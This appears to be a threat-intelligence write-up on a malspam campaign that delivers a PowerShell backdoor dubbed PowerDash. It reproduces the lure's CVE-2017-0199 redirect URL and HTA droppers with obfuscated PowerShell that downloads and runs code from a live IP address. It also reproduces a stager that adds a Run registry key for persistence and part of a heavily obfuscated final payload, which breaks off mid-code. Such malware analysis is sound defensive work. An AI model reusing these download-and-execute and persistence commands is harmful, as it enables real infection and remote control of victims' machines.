Malspam campaign delivering PowerDash – a tiny PowerShell backdoor

In late April we observed a malspam campaign delivering a previously unseen PowerShell malware. We decided to provide an overview of the campaign and some of the malware capabilities. We're also dubbing this malware family as "PowerDash" because of the "/dash" path on C2 server, used as a gateway for bots.

Execution graph

Click on an element to navigate to the corresponding article section

Lure email message

The lure email is fairly short. It asks the recipient to provide price quotas on the inquiry attached to the email. A compromised email account was used to send out the messages.

The attachment is a MS Word document that exploits the CVE-2017-0199 vulnerability and fetches an additional HTA payload from a remote location.

❰user❙/❱✔≻ strings ObjectPool/_1743066221/[3]LinkInfo
https://track.adform.net/adfserve/?bn=12345;redirurl=http://5.63.152.179/doc/zal_nr_1_zap_ofert(8164).doc

Judging by the non-unique tracking identifier – 12345 the tracking service was most likely used as an attempt to bypass basic email security solutions, not to track the campaign reach.

HTA payload

The HTA payload fetches and executes a PowerShell payload (stager) from the same host.

<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -1000, -1000
Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell SI Variable:\9n ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/1txt/8164').GetResponse().GetResponseStream());Set-Variable Abg '';Try{While((LS Variable:Abg).Value+=[Char](Variable 9n).Value.ReadByte()){}}Catch{};&$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*Co*me'}).Name).Invoke('*-Ex*n',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)(LS Variable:Abg).Value",0
Window.Close
</script>

Stager

The stager is responsible for achieving persistence on the machine and downloading the final payload. The former is performed in a pretty standard manner – by downloading yet another HTA payload to the temporary directory and adding an entry to the Autorun registry key to execute it using mshta.exe.

After that's finished, the program goes on to download and run the final payload.

$Pth = "$env:temp\$env:computername.hta";
(New-Object System.Net.WebClient).DownloadFile('http://5.63.152.179/pl/2ht/8164',$Pth);
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "wsz_8164" /t REG_SZ /F /D "$Env:SystemRoot\System32\mshta.exe $Pth";
SI Variable:\bNW ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/3txt/8164').GetResponse().GetResponseStream());
SV DLR '';
Try{While(1){(Get-ChildItem Variable:DLR).Value+=[Char](Get-Item Variable:/bNW).Value.ReadByte()}}Catch{};
.([ScriptBlock]::Create((Get-ChildItem Variable:DLR).Value))

Persistence HTA

The persistence script is almost identical to the first HTA payload, with the exception of executing the final payload instead of the stager.

<script>
resizeTo (0,0);
moveTo (-1240, -1240);
r = new ActiveXObject("WScript.Shell").Run("powershell SI Variable:\9n ([Net.HttpWebRequest]::Create('http://5.63.152.179/pl/3txt/8164').GetResponse().GetResponseStream());Set-Variable Abg '';Try{While((LS Variable:Abg).Value+=[Char](Variable 9n).Value.ReadByte()){}}Catch{};&$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(GCI Variable:_).Value.Name-like'*Co*me'}).Name).Invoke('*-Ex*n',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)(LS Variable:Abg).Value",0,true);
window.close();
</script>

The payload – PowerDash

The final payload is heavily obfuscated using some kind of PowerShell version of JSFuck¹.

('______'  |  %{  ${~}=+$()  }  {${``%}  =  ${~}  }  {  ${~*(}  =++  ${~}  }{  ${[*}  =  (  ${~}=  ${~}+  ${~*(}  )  }  {${[)$}  =(${~}=  ${~}+  ${~*(})  }{${``}=(  ${~}=${~}  +  ${~*(}  )}  {  ${;!@}=(  ${~}=${~}+  ${~*(}  )  }  {${#)``}  =(${~}=  ${~}  +${~*(}  )  }{${'}=(${~}  =  ${~}+${~*(})  }  {${.#=}  =(  ${~}  =${~}+${~*(})}  {  ${#+}=  (  ${~}=  ${~}  +  ${~*(}  )  }{${@}  ="["+  "$(@{}  )"[${'}  ]+  "$(@{  })"[  "${~*(}"  +  "${#+}"]+  "$(  @{}  )"[  "${[*}"  +  "${``%}"]+  "$?  "[${~*(}]  +  "]"}{${~}="".("$(@{  }  )  "["${~*(}"  +  "${``}"  ]  +"$(@{  }  )  "["${~*(}"  +"${#)``}"  ]+  "$(@{})"[${``%}]+"$(@{})  "[  ${``}  ]  +"$?"[${~*(}]+  "$(@{})  "[${[)$}]  )}{  ${~}=  "$(@{  })"["${~*(}${``}"]  +  "$(@{  })"[  ${``}  ]  +"${~}"["${[*}${'}"  ]  }  );  .  ${~}("${~}  (  ${@}${#+}${~*(}+${@}${'}${.#=}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +${@}${``}${#)``}+  ${@}${.#=}${[)$}  +  ${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${.#=}+  ${@}${~*(}${``%}${;!@}  +${@}${#+}${#+}  +  ${@}${~*(}${``%}${~*(}+${@}${.#=}${``%}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}+${@}${'}${'}  +  ${@}${#+}${'}  +  ${@}${~*(}${~*(}${``%}+  ${@}${#+}${'}+${@}${~*(}${``%}${[)$}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}+  ${@}${#+}${[)$}  +${@}${;!@}${.#=}+${@}${;!@}${.#=}+  ${@}${.#=}${[)$}+  ${@}${~*(}${``%}${~*(}+${@}${#+}${#+}  +${@}${~*(}${~*(}${'}  +${@}${~*(}${~*(}${``}  +  ${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${#)``}+${@}${~*(}${[*}${~*(}  +  ${@}${.#=}${``%}  +${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${~*(}${~*(}+  ${@}${#+}${#+}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${.#=}+${@}${[)$}${[*}  +${@}${#)``}${~*(}  +${@}${[)$}${[*}+  ${@}${#+}${~*(}  +${@}${'}${.#=}  +${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${#)``}  +  ${@}${``}${#)``}+  ${@}${.#=}${[)$}+  ${@}${~*(}${``%}${~*(}  +${@}${#+}${#+}+${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${``}  +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${#)``}  +${@}${~*(}${[*}${~*(}+${@}${.#=}${``%}  +${@}${~*(}${~*(}${``}  +${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${~*(}+${@}${#+}${#+}  +  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${.#=}+${@}${.#=}${``}  +  ${@}${~*(}${[*}${~*(}+  ${@}${~*(}${~*(}${[*}+${@}${~*(}${``%}${~*(}  +  ${@}${#+}${[)$}  +${@}${;!@}${.#=}+  ${@}${;!@}${.#=}+${@}${.#=}${``}+${@}${~*(}${``%}${.#=}  +  ${@}${~*(}${~*(}${;!@}  +${@}${``}${#+}  +${@}${;!@}${``%}  +  ${@}${~*(}${[)$}  +${@}${~*(}${``%}  +${@}${#+}${~*(}  +${@}${.#=}${[)$}  +${@}${~*(}${[*}${~*(}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${``%}${~*(}+  ${@}${~*(}${``%}${#+}  +${@}${``}${#)``}+  ${@}${'}${.#=}  +  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${#)``}+${@}${``}${#)``}  +  ${@}${.#=}${[)$}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${.#=}+  ${@}${~*(}${``%}${;!@}  +${@}${#+}${#+}+  ${@}${~*(}${``%}${~*(}+${@}${.#=}${``%}  +  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${#)``}+  ${@}${'}${'}+  ${@}${#+}${'}  +${@}${~*(}${~*(}${``%}+${@}${#+}${'}  +${@}${~*(}${``%}${[)$}+  ${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +  ${@}${#+}${[)$}+  ${@}${;!@}${.#=}  +${@}${;!@}${.#=}  +  ${@}${.#=}${[)$}  +${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +${@}${~*(}${~*(}${.#=}+${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${``}  +  ${@}${#)``}${'}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${``%}${;!@}  +${@}${~*(}${``%}${[*}+  ${@}${~*(}${``%}${;!@}+${@}${#+}${#+}+${@}${#+}${'}+  ${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${~*(}  +${@}${.#=}${#)``}  +${@}${#+}${'}  +  ${@}${~*(}${``%}${.#=}  +  ${@}${~*(}${``%}${;!@}  +${@}${~*(}${``%}${``%}  +  ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${``%}  +${@}${#)``}${'}+  ${@}${#+}${'}  +  ${@}${~*(}${``%}${.#=}+  ${@}${~*(}${``%}${.#=}+  ${@}${#+}${.#=}  +${@}${#+}${'}  +${@}${#+}${#+}+${@}${~*(}${``%}${'}  +  ${@}${[)$}${[*}+  ${@}${#)``}${~*(}+  ${@}${[)$}${[*}  +  ${@}${~*(}${[*}${[)$}+  ${@}${[)$}${#)``}  +  ${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${'}  +  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${[*}${;!@}+${@}${~*(}${[)$}  +${@}${~*(}${``%}+${@}${[)$}${#)``}+${@}${~*(}${~*(}${'}  +  ${@}${~*(}${~*(}${``}+  ${@}${~*(}${``%}${.#=}  +${@}${[)$}${[*}+  ${@}${[)$}${[*}+${@}${#)``}${~*(}+${@}${[)$}${[*}  +  ${@}${[)$}${``}+${@}${~*(}${``%}${``}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${#)``}+${@}${~*(}${~*(}${[*}+  ${@}${~*(}${~*(}${;!@}+  ${@}${;!@}${.#=}  +${@}${``}${'}  +  ${@}${``}${'}  +  ${@}${;!@}${'}  +${@}${;!@}${[)$}  +  ${@}${``}${#)``}  +  ${@}${``}${#+}  +  ${@}${;!@}${``}+${@}${;!@}${~*(}  +  ${@}${``}${#)``}+  ${@}${;!@}${``%}  +${@}${;!@}${[*}  +${@}${``}${.#=}+${@}${``}${#)``}  +${@}${``}${#+}+${@}${;!@}${#)``}  +${@}${;!@}${[*}  +${@}${;!@}${.#=}  +${@}${;!@}${#)``}  +${@}${``}${.#=}  +${@}${``}${.#=}+${@}${``}${.#=}+${@}${``}${'}  +  ${@}${~*(}${``%}${``%}+${@}${#+}${'}+${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${``%}${``}  +  ${@}${``}${'}  +${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}+${@}${#+}${;!@}+${@}${~*(}${``%}${``%}+${@}${#+}${'}+  ${@}${~*(}${~*(}${#)``}+  ${@}${#+}${'}  +  ${@}${``}${'}+  ${@}${[)$}${``}+${@}${~*(}${[)$}  +  ${@}${~*(}${``%}  +  ${@}${[)$}${#)``}+${@}${#+}${.#=}+${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${``%}+${@}${~*(}${[*}${~*(}  +  ${@}${[)$}${[*}  +${@}${#)``}${~*(}+${@}${[)$}${[*}  +  ${@}${#)``}${``}  +  ${@}${~*(}${[*}${[)$}+  ${@}${~*(}${[)$}+${@}${~*(}${``%}+${@}${[)$}${[*}+  ${@}${[)$}${[*}  +  ${@}${[)$}${[*}  +  ${@}${[)$}${[*}+  ${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${'}+${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${``%}  +${@}${[)$}${[*}+${@}${#)``}${~*(}  +  ${@}${[)$}${[*}+  ${@}${``}${``%}  +  ${@}${'}${~*(}+  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +  ${@}${``}${;!@}+  ${@}${.#=}${'}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${;!@}+${@}${'}${#+}+  ${@}${#+}${.#=}+  ${@}${~*(}${``%}${#)``}  +${@}${~*(}${``%}${~*(}+${@}${#+}${#+}  +${@}${~*(}${~*(}${#)``}  +  ${@}${[)$}${[*}  +  ${@}${.#=}${'}  +  ${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${``%}  +  ${@}${;!@}${~*(}  +  ${@}${;!@}${``%}+${@}${#+}${;!@}+${@}${#)``}${'}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${#+}+${@}${~*(}${~*(}${[*}+  ${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +${@}${.#=}${[)$}+${@}${~*(}${[*}${~*(}  +${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${``%}${#+}  +${@}${.#=}${``%}  +  ${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${'}+${@}${#+}${#+}+  ${@}${~*(}${~*(}${#)``}+${@}${``}${~*(}  +${@}${``}${#)``}+${@}${.#=}${;!@}  +${@}${.#=}${;!@}+  ${@}${'}${[)$}  +  ${@}${#)``}${.#=}  +${@}${~*(}${[)$}  +${@}${~*(}${``%}  +  ${@}${[)$}${[*}  +  ${@}${[)$}${[*}  +${@}${[)$}${[*}  +${@}${[)$}${[*}+  ${@}${~*(}${~*(}${``%}+  ${@}${#+}${'}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${~*(}  +${@}${[)$}${[*}  +  ${@}${#)``}${~*(}+  ${@}${[)$}${[*}+  ${@}${[)$}${#)``}  +${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${~*(}${.#=}+  ${@}${;!@}${.#=}  +${@}${#)``}${'}  +  ${@}${'}${#+}  +  ${@}${'}${'}  +${@}${.#=}${``%}  +${@}${.#=}${;!@}  +  ${@}${.#=}${``}  +  ${@}${#)``}${#+}+  ${@}${.#=}${[*}  +${@}${'}${.#=}  +${@}${#)``}${;!@}  +${@}${'}${'}+${@}${#)``}${#+}+  ${@}${~*(}${[)$}  +  ${@}${~*(}${``%}  +  ${@}${[)$}${[*}+${@}${[)$}${[*}+${@}${[)$}${[*}  +${@}${[)$}${[*}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}+  ${@}${[)$}${[*}+${@}${[)$}${[*}  +  ${@}${#)``}${~*(}+  ${@}${[)$}${[*}+${@}${``}${``%}+${@}${'}${~*(}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${#)``}+${@}${``}${;!@}  +  ${@}${.#=}${'}+${@}${~*(}${``%}${#+}+  ${@}${~*(}${``%}${;!@}+  ${@}${'}${#+}+  ${@}${#+}${.#=}  +${@}${~*(}${``%}${#)``}  +${@}${~*(}${``%}${~*(}+  ${@}${#+}${#+}+  ${@}${~*(}${~*(}${#)``}+  ${@}${[)$}${[*}  +  ${@}${``}${;!@}+  ${@}${#)``}${'}  +${@}${~*(}${``%}${.#=}  +${@}${#+}${'}+  ${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}  +${@}${.#=}${'}  +${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${``%}+  ${@}${;!@}${~*(}  +${@}${;!@}${``%}  +${@}${#+}${;!@}  +  ${@}${'}${#+}  +${@}${~*(}${~*(}${[*}  +${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}+  ${@}${#+}${'}  +${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${``%}${[)$}  +${@}${.#=}${[)$}+${@}${~*(}${[*}${~*(}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${``%}${#+}  +  ${@}${``}${~*(}+  ${@}${``}${#)``}  +  ${@}${#)``}${'}  +${@}${#+}${'}+  ${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}  +${@}${~*(}${[)$}+  ${@}${~*(}${``%}+  ${@}${[)$}${[*}+${@}${[)$}${[*}+  ${@}${[)$}${[*}  +  ${@}${[)$}${[*}  +${@}${~*(}${``%}${.#=}  +  ${@}${#+}${'}  +${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${``%}${[)$}  +  ${@}${[)$}${[*}+  ${@}${#)``}${~*(}+${@}${[)$}${[*}+  ${@}${``}${``%}  +  ${@}${'}${~*(}  +${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${#)``}  +  ${@}${``}${;!@}+  ${@}${#)``}${'}  +  ${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${#+}  +${@}${'}${[)$}  +  ${@}${~*(}${~*(}${``%}  +${@}${~*(}${~*(}${;!@}+  ${@}${~*(}${~*(}${#)``}  +  ${@}${#+}${'}+${@}${~*(}${~*(}${``%}+${@}${#+}${#+}  +${@}${~*(}${``%}${~*(}  +  ${@}${[)$}${[*}+  ${@}${#)``}${'}  +  ${@}${'}${[)$}  +  ${@}${'}${'}  +  ${@}${#+}${;!@}  +  ${@}${.#=}${#)``}  +${@}${~*(}${``%}${;!@}+  ${@}${~*(}${``%}${``%}+  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${~*(}+${@}${#)``}${'}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${``%}${.#=}  +${@}${~*(}${``%}${.#=}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}  +  ${@}${~*(}${[*}${``}  +${@}${[)$}${'}  +  ${@}${~*(}${[*}${[)$}  +${@}${#+}${~*(}+  ${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${``%}  +${@}${~*(}${~*(}${#)``}+  ${@}${#+}${[)$}  +${@}${#+}${~*(}+  ${@}${~*(}${``%}${#+}+  ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${``}  +${@}${#+}${[)$}+  ${@}${;!@}${.#=}  +  ${@}${;!@}${.#=}+${@}${~*(}${~*(}${``}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${'}  +  ${@}${~*(}${~*(}${``%}  +${@}${~*(}${``%}${``%}+  ${@}${``}${``%}  +${@}${[)$}${#)``}  +  ${@}${#+}${;!@}+  ${@}${``}${#)``}  +${@}${#)``}${;!@}  +  ${@}${~*(}${``%}${``%}+  ${@}${#+}${'}+${@}${~*(}${~*(}${[*}  +${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}+  ${@}${.#=}${[*}+${@}${#)``}${;!@}+  ${@}${'}${'}+${@}${``}${'}+${@}${``}${#+}  +  ${@}${'}${~*(}+  ${@}${#)``}${#)``}+  ${@}${``}${~*(}  +  ${@}${~*(}${[*}${;!@}  +  ${@}${``}${~*(}+${@}${[)$}${[*}  +  ${@}${``}${;!@}+  ${@}${~*(}${``%}${#)``}+${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${``%}+  ${@}${``}${``%}  +${@}${[)$}${``}  +${@}${;!@}${#+}  +${@}${[)$}${[*}  +  ${@}${[)$}${``}  +  ${@}${``}${~*(}+${@}${~*(}${[)$}  +  ${@}${~*(}${``%}+  ${@}${[)$}${[*}+  ${@}${[)$}${[*}+  ${@}${[)$}${[*}+  ${@}${[)$}${[*}+  ${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${#+}  +${@}${#+}${'}+${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${``%}+  ${@}${[)$}${[*}  +  ${@}${#)``}${~*(}  +${@}${[)$}${[*}+${@}${``}${``%}+${@}${'}${~*(}  +  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${#)``}  +  ${@}${``}${;!@}  +  ${@}${.#=}${'}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${;!@}+  ${@}${'}${#+}+${@}${#+}${.#=}  +${@}${~*(}${``%}${#)``}+  ${@}${~*(}${``%}${~*(}  +  ${@}${#+}${#+}  +  ${@}${~*(}${~*(}${#)``}  +  ${@}${[)$}${[*}+${@}${``}${;!@}  +${@}${#)``}${'}+${@}${~*(}${``%}${.#=}+  ${@}${#+}${'}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}+  ${@}${.#=}${'}+${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${``%}+  ${@}${;!@}${~*(}  +${@}${;!@}${``%}  +${@}${#+}${;!@}  +  ${@}${#)``}${'}+${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${~*(}${[*}  +${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${``}  +  ${@}${.#=}${[)$}+  ${@}${~*(}${[*}${~*(}+  ${@}${~*(}${~*(}${;!@}+  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${``%}${#+}+${@}${``}${~*(}  +  ${@}${``}${#)``}  +${@}${#)``}${.#=}+  ${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${#+}+  ${@}${#+}${'}  +${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${``%}+${@}${~*(}${[)$}  +${@}${~*(}${``%}  +  ${@}${[)$}${[*}+${@}${[)$}${[*}+${@}${[)$}${[*}  +  ${@}${[)$}${[*}+${@}${#+}${'}  +${@}${~*(}${~*(}${.#=}  +${@}${[)$}${[*}+${@}${#)``}${~*(}+  ${@}${[)$}${[*}  +${@}${``}${``%}  +  ${@}${'}${~*(}+  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${#)``}  +${@}${``}${;!@}  +${@}${.#=}${'}+  ${@}${~*(}${``%}${#+}+  ${@}${~*(}${``%}${;!@}+${@}${'}${#+}  +${@}${#+}${.#=}  +  ${@}${~*(}${``%}${#)``}+  ${@}${~*(}${``%}${~*(}  +${@}${#+}${#+}  +  ${@}${~*(}${~*(}${#)``}+  ${@}${[)$}${[*}+${@}${``}${;!@}+  ${@}${~*(}${~*(}${``%}+${@}${#+}${'}  +${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${~*(}${[*}  +  ${@}${#+}${'}  +  ${@}${#+}${#+}  +${@}${~*(}${``%}${~*(}  +  ${@}${[)$}${[*}+${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${#)``}  +  ${@}${#+}${[*}  +  ${@}${.#=}${[)$}+  ${@}${~*(}${``%}${~*(}  +  ${@}${#+}${#+}  +${@}${~*(}${~*(}${'}+${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${[*}${~*(}+${@}${#)``}${'}  +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}  +${@}${;!@}${``%}+  ${@}${[)$}${[*}+  ${@}${``}${;!@}  +  ${@}${#+}${#+}  +  ${@}${~*(}${``%}${.#=}+  ${@}${#+}${'}+${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${;!@}+  ${@}${[)$}${[*}+${@}${#)``}${;!@}+${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${.#=}+${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${``}  +${@}${~*(}${~*(}${'}  +  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${``%}${``%}+${@}${~*(}${~*(}${'}+${@}${#+}${#+}  +  ${@}${~*(}${~*(}${#)``}+  ${@}${``}${~*(}  +  ${@}${``}${#)``}+  ${@}${#)``}${.#=}+${@}${~*(}${``%}${;!@}  +  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${``%}${.#=}  +${@}${#+}${'}+  ${@}${~*(}${[*}${~*(}+  ${@}${'}${.#=}  +  ${@}${#+}${'}  +  ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${~*(}+${@}${~*(}${[)$}  +  ${@}${~*(}${``%}  +${@}${[)$}${[*}+  ${@}${[)$}${[*}+${@}${[)$}${[*}  +  ${@}${[)$}${[*}+${@}${#+}${#+}+${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${~*(}${'}  +${@}${[)$}${[*}  +${@}${#)``}${~*(}+  ${@}${[)$}${[*}  +${@}${``}${``%}+  ${@}${'}${~*(}+  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +${@}${``}${;!@}+  ${@}${#)``}${'}  +${@}${~*(}${``%}${;!@}  +${@}${~*(}${``%}${#+}+  ${@}${'}${[)$}  +  ${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${#)``}+${@}${#+}${'}  +  ${@}${~*(}${~*(}${``%}  +${@}${#+}${#+}  +${@}${~*(}${``%}${~*(}  +${@}${[)$}${[*}  +${@}${#)``}${'}  +  ${@}${'}${[)$}+  ${@}${'}${'}  +${@}${#+}${;!@}  +  ${@}${.#=}${``%}+  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${~*(}+${@}${#+}${#+}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${;!@}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``}+${@}${``}${~*(}+  ${@}${``}${#)``}  +  ${@}${'}${.#=}  +  ${@}${#+}${'}+${@}${~*(}${``%}${#+}  +${@}${~*(}${``%}${~*(}+${@}${~*(}${[)$}+${@}${~*(}${``%}  +  ${@}${[)$}${[*}+${@}${[)$}${[*}  +${@}${[)$}${[*}  +${@}${[)$}${[*}+${@}${~*(}${``%}${[)$}+  ${@}${~*(}${~*(}${[*}  +${@}${~*(}${~*(}${'}+${@}${[)$}${[*}+  ${@}${#)``}${~*(}+  ${@}${[)$}${[*}+${@}${``}${``%}+  ${@}${'}${~*(}+${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +${@}${``}${;!@}  +  ${@}${#)``}${'}+  ${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${#+}  +${@}${'}${[)$}  +${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${~*(}${#)``}  +  ${@}${#+}${'}  +  ${@}${~*(}${~*(}${``%}  +${@}${#+}${#+}  +  ${@}${~*(}${``%}${~*(}  +${@}${[)$}${[*}  +  ${@}${#)``}${'}  +${@}${'}${[)$}+  ${@}${'}${'}  +  ${@}${#+}${;!@}  +  ${@}${.#=}${#)``}+${@}${~*(}${``%}${;!@}+${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${~*(}  +${@}${#)``}${'}+${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${.#=}+${@}${~*(}${``%}${.#=}+  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}+  ${@}${~*(}${[*}${``}+  ${@}${[)$}${'}+${@}${~*(}${[*}${[)$}  +${@}${[)$}${#)``}  +  ${@}${#+}${;!@}+  